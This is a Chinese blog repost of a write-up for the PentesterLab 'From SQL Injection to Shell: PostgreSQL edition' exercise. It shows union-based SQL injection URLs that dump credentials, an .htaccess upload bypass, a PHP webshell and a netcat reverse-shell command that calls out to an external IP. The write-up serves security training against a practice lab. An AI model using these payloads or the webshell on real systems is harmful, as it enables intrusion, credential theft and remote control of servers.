PentesterLab-From SQL Injection to Shell: PostgreSQL edition

最新推荐文章于 2022-10-11 20:17:00 发布
最新推荐文章于 2022-10-11 20:17:00 发布
阅读量193 收藏
点赞数
文章标签: shell php 数据库
原文链接:http://www.cnblogs.com/zlgxzswjy/p/9668191.html
版权

 

  

一、打开页面,随便点了几下,返现和From SQL Injection to Shell差不多,直奔主题开始注入

  由于PostgreSQL与MySQL不同,几个关注点需要注意下

二、order by下看看有几个字段

/cat.php?id=1%20order%20by%204

#order by 4正常,5出现报错,说明有4个字段

三、查看注入点在什么位置,这里与MySQL不同的是,不能再用select 1,2,3……的方式去探测,要改用null,因为PostgreSQL对类型限制很严格

http://192.168.109.131/cat.php?id=1%20union%20select%20null,version(),null,null

发现只有第二个字段可以出来东西,注入点在第二个字段

四、查看当前库名

http://192.168.109.131/cat.php?id=1%20UNION%20SELECT%20null,datname,null,null%20from%20pg_database%20limit%201%20offset%205

五、查看表名

http://192.168.109.131/cat.php?id=1%20UNION%20SELECT%20null,relname,null,null%20from+pg_stat_user_tables+limit+1+offset+0

六、查看各个字段,遍历offset

http://192.168.109.131/cat.php?id=1%20UNION%20SELECT%20null,column_name,null,null%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%201%20offset%202

得出有login和password

七、直接通过拼接字符串,读取数据

http://192.168.109.131/cat.php?id=1%20UNION%20SELECT%20null,login||chr(124)||password,null,null%20from%20users

八、MD5解密后,为admin|P4ssw0rd,直接登录后台进行上传

九、上传时发现,改后缀名为php3,Content-Type,加入图片文件头都无法成功上传,查询教程后得知,可以通过.htaccess来进行绕过

十、先编写一个.htaccess文件,内容为一下内容,进行上传

AddType application/x-httpd-php .blah

这个文件的意思是告诉apache,把.blah后缀的文件按照php进行解析

十一、在上传shell,不过这次shell不是.php后缀名,而是.blah

<?php
system($_GET['cmd'])
?>

十二、查看源代码,得知上传位置,直接访问上传的webshell,进行shell反弹

http://192.168.109.131/admin/uploads/function.blah?cmd=nc%2030.117.75.238%209999%20-e%20/bin/bash

 

转载于:https://www.cnblogs.com/zlgxzswjy/p/9668191.html

王爷的大房子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MCW-Migrating-Oracle-to-Azure-SQL-and-PostgreSQL:MCW将Oracle迁移到Azure SQLPostgreSQL
04-28
将Oracle迁移到Azure SQLPostgreSQL 过去几年,全球进口商(WWI)取得了显着增长。 除了可以预测的增长之外,他们在数据仓库中存储的数据也有了很大的增长。 他们的数据仓库开始显示其寿命,在提取,转换和加载...
PentesterLab靶场sql注入流程
m0_37570494的博客
01-28 3798
环境安装 随便在网上找了个Pentester的靶场,结果是2013年的,那就从2013年的这个靶场开始学习 下载镜像的地址: https://pentesterlab.com/exercises/web_for_pentester_II/iso 正常找个虚拟机,进行iso的安装 安装完成后,查下虚拟机的IP,直接访问即可http://192.168.29.129/ sql注入 Example 1 万能密码: 自己尝试了几个密码,筛选出了这几个通关的,亲试可用: admin'or 1=
pentesterlab-sql
qq_44881113的博客
11-02 311
第一关 http://192.168.1.142/sqli/example1.php?name=root 有可见传递参数,测试是否存在注入 http://192.168.1.142/sqli/example1.php?name=root’ 报错即存在注入 pyaload http://192.168.1.142/sqli/example1.php?name=root' order by 1 %23 http://192.168.1.142/sqli/example1.php?name=root%27uni
[Pentester Lab]from_sql_to_shell靶机
Re1_zf的博客
10-11 729
由此得到的这个账号密码可能就是上面那个登录页面的账号密码,而且这sqlmap也直接给解密了密码的md5值。这个表是一个图片表,名称是一个herf,可以直接查看,后面的delete应该也是可以删除这张图片。测试一下注入点,页面的内容发生了改变,并且改编成的页面内容跟预期是一样的。首先找到一个传参的页面,记好测试前的页面的状态,然后开始测试。上传成功,检测机制不会涉及到内容,可能只是单纯的文件后缀检测。页面有些简单,但是众所周知,越简单的页面越恐怖,继续往下看。想办法上传一个可以以php格式解析的文件。
PentesterLab-From SQL Injection to Shell
weixin_30530339的博客
09-14 194
一、打开靶机ip出现如下界面: 随便点一下,点到test链接,访问了如下url:http://192.168.109.131/cat.php?id=1,这出现了一个id,常规思路这个位置可能有sql注入。然后看其他链接,都差不多,直到点到Admin的链接时,出来一个后台。 二、SQL注入先行 既然有id=1,首先看下这个id是字符还是数字,后面加一个 ' 号,出现了Mysql的报...
Pentester Lab SQL to shell
hl1293348082的专栏
04-11 302
PentesterLab提供了可用于测试和了解漏洞的易受攻击的系统。 官方地址:https://pentesterlab.com/ 渗透环境 Kali 192.168.22.128 靶机 我们去发现。(在同一内网) 正文开始 首先先介绍一款工具,个人觉得老牛逼——Netdiscover,之前我询问一哥们arp扫描工具时他推荐的。 工具可以在网络上扫描IP地址,检查在线主机或搜索为它们发送的ARP请求, root@kali:~# netdiscover //直接回车不带任何 自动快速发现
powa-archivist:powa-archivist:powa PostgreSQL扩展
02-05
标题和描述中提到的“powa-archivist”是针对PostgreSQL数据库的一个扩展,它主要用于性能分析和优化。"powa"是"PostgreSQL Online Analytics"的缩写,它提供了一组工具来帮助用户深入了解其数据库的运行情况。"powa...
PostgresQL-Materialized-View-Demo:PostgresQL中物化视图的演示脚本
04-17
在您的机器上安装了postgresql 运行脚本 createdb your_database psql -f setup_scripts/00_setup.sql psql -d your_database 如果需要更多种子数据, bundle exec ruby dev.rb以为20000个用户,10000个视频,...
pg-index-health-sql:pg-index-health-sql是一组sql查询,用于分析和维护Postgresql数据库中的索引健康
05-19
pg-index-health-sql pg-index-health-sql是一组sql查询,用于分析和维护Postgresql数据库中的索引运行状况。支持的PostgreSQL版本可用支票pg-index-health-sql允许您检测以下问题: 无效的(损坏的)索引( )。 ...
bitnami-docker-postgresql-repmgr:具有Replication Manager Docker映像的Bitnami PostgreSQL
02-15
$ docker run --name postgresql-repmgr bitnami/postgresql-repmgr:latest Docker撰写 $ curl -sSL ...
From SQL Injection to Shell学习笔记
06-08
pentesterlab的From SQL Injection to Shell模块学习经验
from injection shell sql to_FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION
weixin_42354108的博客
01-17 69
FROM SQL INJECTION TO SHELL:POSTGRESQL EDITION先介绍一下POSTGRESQL。这是一款数据库管理系统,与oracle是同类型软件。08年左右的市场占有率为8%。上图为ITPUB社区开源数据库使用状况调查探测SQL注入本关可以说是FROM SQL INJECTION TO SHELL 这关的延续。建议先通过之前的关。这关基本上和FROM SQL IN...
[Pentester Lab]From SQL Injection to Shell
CD的博客
04-07 644
本文翻译了[Pentester Lab]From SQL Injection to Shell的要点,记录了笔者按照教程进行复现的过程。 By the way,庆祝一下自己拿到的第一个Web Shell(虽然是靶机233333 1. 介绍 实验目的: 在基于PHP的网站中使用SQL注入,以及攻击者如何使用SQL注入获取管理员界面的访问权限。然后,攻击者可以在Server上实现代码执行...
from injection shell sql to_CTF靶场系列-Pentester Lab: From SQL injection to Shell...
weixin_39692557的博客
01-17 268
下载地址https://download.vulnhub.com/pentesterlab/from_sqli_to_shell_II_i386.iso实战演练使用netdiscover命令查找靶机的IP。使用nmap查看靶机开放的端口打开80端口直接用sqlmap测试显示是没有漏洞的查了资料发现需要添加这个header,X-Forwarded-For 现在尝试使用以上凭据访问管理控制台,再...
PentesterLab渗透师养成计划
ncafei的博客
01-12 2207
原文链接 Ps: PentesterLab推出了一个渗透师的学习课程,看了一下感觉挺有条理,可以顺着这个学习路径巩固知识或者从新学习. 课程地址 ———— http://pentesterlab.com/bootcamp/ 课程总共分为15周,这我也以其为区分,这个学习路径我感觉还是非常不错的. 0×01 Week 1 – Linux and scripting ————————
Pentester Lab闯关记录2(SQL Injections)
weixin_43408042的博客
10-14 475
Pentester Lab闯关记录2(SQL Injections)example1验证漏洞是否存在猜测查询返回的列数收集数据库基本信息爆破数据库 example1 验证漏洞是否存在 首先构造下面payload测试是否存在sql注入漏洞: http://192.168.202.131/sqli/example1.php?name=root’ and 1=1 --+ payload为:’ and 1=1 --+ 首先使用'闭合sql语句中的’,然后注入payload,使用--+注释掉后面的内容 发现正常返
PentesterLab渗透演练平台
weixin_34378767的博客
02-03 392
转载自: https://www.blackh4t.org/archives/1143.html http://www.91ri.org/5958.html     1、  什么是WebApp Pentesting WebApp Pentesting,由PentesterLab出品。官方给自己的定义是一个简单又十分有效学习渗透测试的演练平台。它提供诸多的漏洞系统以供网络安全发烧友进...
手工注入常用SQL语句
weixin_34041003的博客
11-09 140
判断数据库类型: Access: and (select id from MSysAccessObjects) >0 返回正常说明是access MSSQL: and (select id from sysobjects) >0 返回正常说明是mssql MySQL: and length(user())>0 返回正常说明是MySQL mysql: 1.判断版本 a...
shell自动执行postgres数据库sql方法
吴业亮的专栏
04-13 8244
作者:【吴业亮】 博客:https://wuyeliang.blog.csdn.net/ 免密登录 将密码写在客户端服务器的用户家目录下,创建一个.pgpass文件,并将权限设置为0600,就可以实现了。 文件的格式如下: hostname:port:database:username:password 例如: 172.16.8.100:5432:postgres:postgres:Change...
PostgreSQL 11-16版本主要特性.pdf
最新发布
08-08
"本文档详细介绍了PostgreSQL数据库系统从11到16版本的主要特性,重点关注了哈希分区的支持、存储过程的事务化、并行创建索引和并行执行等增强功能。" PostgreSQL是一个开源的关系型数据库管理系统,随着时间的推移...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值